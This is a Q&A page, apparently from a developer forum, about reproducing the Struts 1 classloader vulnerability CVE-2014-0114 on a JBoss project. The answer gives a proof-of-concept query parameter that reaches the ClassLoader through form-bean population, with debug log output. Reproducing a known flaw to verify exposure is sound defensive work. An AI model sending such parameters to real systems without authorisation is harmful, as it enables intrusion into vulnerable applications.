Classloader vulnerability reproducing procedure in struts 1.1

security jboss classloader struts-1 reproducible-research
SkyWalker picture SkyWalker · May 5, 2014 · Viewed 12.6k times · Source

In Struts1, I heard that there is a classloader vulnerability issue which is cause by CVE-2014-0114. But I am unable to reproduce this respect to my project. Can anyone help me how to reproduce this issue. I googled but not get any procedure of reproducing.

I am using struts-1.1, Jboss -4.2.3.GA, Apache 2.2.0, MySql 5.0.37, JKMod, JDK 1.6.0_12, Ant 1.7.0 for my web project.

Answer

Kishore Kirdat picture Kishore Kirdat · May 5, 2014

Try to invoke a URL which is mapped to a struts action (backed by an action form). The framework will try to populate your form bean from query parameters. So if you have a query parameter like ?class.classLoader.defaultAssertionStatus=true, it translates to formBean.getClass().getClassLoader().setDefaultAssertionStatus(true).

If you have enabled debug logging, you would see the following messages:

2014-05-05 12:57:50,238 DEBUG [org.apache.struts.action.RequestProcessor]  Populating bean properties from this request
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils] BeanUtils.populate(com.xxx.struts.demo.web.form.SimpleForm@71909bc, {class.classLoader.defaultAssertionStatus=[Ljava.lang.String;@a6b23fd4})
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils]   setProperty(com.xxx.struts.demo.web.form.SimpleForm@71909bc, class.classLoader.defaultAssertionStatus, [true])
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target bean = com.ibm.ws.classloading.internal.AppClassLoader@3ac10955
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target name = defaultAssertionStatus
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils] Convert string 'true' to class 'boolean'
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils]   Using converter org.apache.commons.beanutils.converters.BooleanConverter@de2943ef
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.PropertyUtils] setSimpleProperty: Invoking method public void java.lang.ClassLoader.setDefaultAssertionStatus(boolean) with value true (class java.lang.Boolean)

Related questions

JBoss AS 7.1 - datasource how to encrypt password

In JBoss AS 5, I have a datasource defined in *-ds.xml but put username/encrypted password in *-jboss-beans.xml. Now in JBoss AS 7.1, the datasource is defined in standalone.xml or domain.xml. Where do I put the encrypted password …

Read More
bouncycastle + JBoss AS7: JCE cannot authenticate the provider BC

I use BouncyCastle for encryption in my application. When I run it standalone, everything works fine. However, if I put it in the webapp and deploy on JBoss server, I get a following error: javax.servlet.ServletException: error constructing MAC: …

Read More
Configure Http Headers in JBoss EAP 7

Do you know if there is a standard way to configure the Http Headers that JBoss EAP 7 sends to the client? I am mainly interested in being able to configure the following ones: X-XSS-Protection X-Frame-Options Strict-Transport-Security Content-Security-Policy X-Content-Type-Options I found …

Read More